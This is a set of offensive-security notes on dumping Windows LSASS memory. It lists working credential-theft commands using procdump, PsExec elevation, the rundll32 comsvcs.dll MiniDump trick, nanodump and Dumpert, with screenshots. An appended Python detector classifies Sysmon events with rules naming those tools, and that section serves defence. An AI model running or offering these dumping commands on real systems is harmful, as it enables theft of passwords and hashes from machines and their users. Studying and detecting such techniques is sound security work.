# LSASS Dumping

## LSASS - Techniques

* Task Manager
* Procdump
* System Informer
* Comsvcs.dll
* Nanodump
* Dumpert

## LSASS Dump: Task Manager

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2F00aKROSA8aKjv1uPuNs1%2Fimage.png?alt=media&#x26;token=949ebf5b-c31a-452e-a8a4-762dfe4485e2" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2FfNCK9V1qNRxaO0m7xIMX%2Fimage.png?alt=media&#x26;token=f0ca56aa-f79a-46eb-9e7d-0d5c3664c695" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2Fwss7wegwupLwUK2KRJIb%2Fimage.png?alt=media&#x26;token=a231f40d-a372-4a1a-9f51-85773b28a6a1" alt=""><figcaption></figcaption></figure>

## LSASS Dump: Procdump

```sh
procdump.exe -accepteula -ma lsass.exe lsadump.dmp
```

Lsass Dump: System&#x20;Informer
--------------

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2FdKY3MoypyFftmu7ckvWU%2Fimage.png?alt=media&#x26;token=389d2b4b-e569-4410-aee6-7bcdd2041d11" alt=""><figcaption></figcaption></figure>

## LSASS Dump: Comsvcs.dll

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2FGJTiyQPtOMTqajmTnoeH%2Fimage.png?alt=media&#x26;token=cba57ba6-c15a-45bc-b265-7ec63eefd989" alt=""><figcaption></figcaption></figure>

```sh
./PsExec -i -d -s cmd.exe
```

```sh
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 688 C:\Users\<user>\Documente\cred_tools\lsass_dump\dmp\lsass.dmp full
```

## LSASS Dump: Nanodump

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2FnQuMZmNEjUtIJLdelvjC%2Fimage.png?alt=media&#x26;token=c24704bd-12b2-44a2-9608-81a0318b8eec" alt=""><figcaption></figcaption></figure>

```sh
./nanodump.x64.exe --write normal_lsass.dmp
```

```sh
./nanodump.x64.exe --silent-process-exit .\wer_lsas
```

## LSASS Dump: Dumpert

<figure><img src="https://1937981690-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FzuuWuDn9s4dQ1J0kb7tE%2Fuploads%2FrjYrHlxkT8VMiGwEeZLo%2Fimage.png?alt=media&#x26;token=45e39355-8613-4663-965f-aeb4daf6efa6" alt=""><figcaption></figcaption></figure>

```sh
Outflank-Dumpert.exe
```
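
A detection-side view of the techniques above, as an added example that is not part of the original notes: it classifies Sysmon-style process-creation (Event ID 1) and process-access (Event ID 10) records. The rule names, the allowlist entry and the sample events are assumptions constructed for illustration; tools with no distinctive command line (Task Manager, System Informer) surface only through the handle-access rule.

```python
import re

PROCESS_VM_READ = 0x0010  # access right required to read another process's memory

# Command-line rules for the invocations listed on this page (Sysmon Event ID 1).
# Name-based rules are weak on their own; the handle-access rule below is the backstop.
CMDLINE_RULES = [
    ("procdump_lsass", re.compile(r"procdump(64)?(\.exe)?\b.*\s-ma\b.*\blsass", re.I)),
    ("comsvcs_minidump", re.compile(r"comsvcs(\.dll)?\s*,?\s*minidump\b", re.I)),
    ("nanodump", re.compile(r"nanodump", re.I)),
    ("dumpert", re.compile(r"dumpert", re.I)),
]

# Assumption: images expected to read LSASS memory in this environment (tune per site).
ALLOWED_SOURCES = {r"c:\program files\windows defender\msmpeng.exe"}


def classify(event):
    """Return the names of the rules that fire for one Sysmon-style event dict."""
    hits = []
    if event.get("EventID") == 1:
        cmd = event.get("CommandLine", "")
        hits += [name for name, rx in CMDLINE_RULES if rx.search(cmd)]
    elif event.get("EventID") == 10:
        target = event.get("TargetImage", "").lower()
        source = event.get("SourceImage", "").lower()
        access = int(event.get("GrantedAccess", "0x0"), 16)
        if (target.endswith("\\lsass.exe") and access & PROCESS_VM_READ
                and source not in ALLOWED_SOURCES):
            hits.append("lsass_memory_read")
    return hits


# Constructed sample events (not captured from a real host).
SAMPLE_EVENTS = [
    {"EventID": 1, "CommandLine": "procdump.exe -accepteula -ma lsass.exe lsadump.dmp"},
    {"EventID": 1, "CommandLine": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 688 C:\Temp\lsass.dmp full"},
    {"EventID": 1, "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
    {"EventID": 10, "SourceImage": r"C:\Program Files\Windows Defender\MsMpEng.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(classify(ev), ev.get("CommandLine") or ev.get("SourceImage"))
```

A dump taken by PID rather than by process name carries no `lsass` string on the command line, which is why the `comsvcs_minidump` rule keys on the export name and the Event ID 10 rule keys on the target image.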
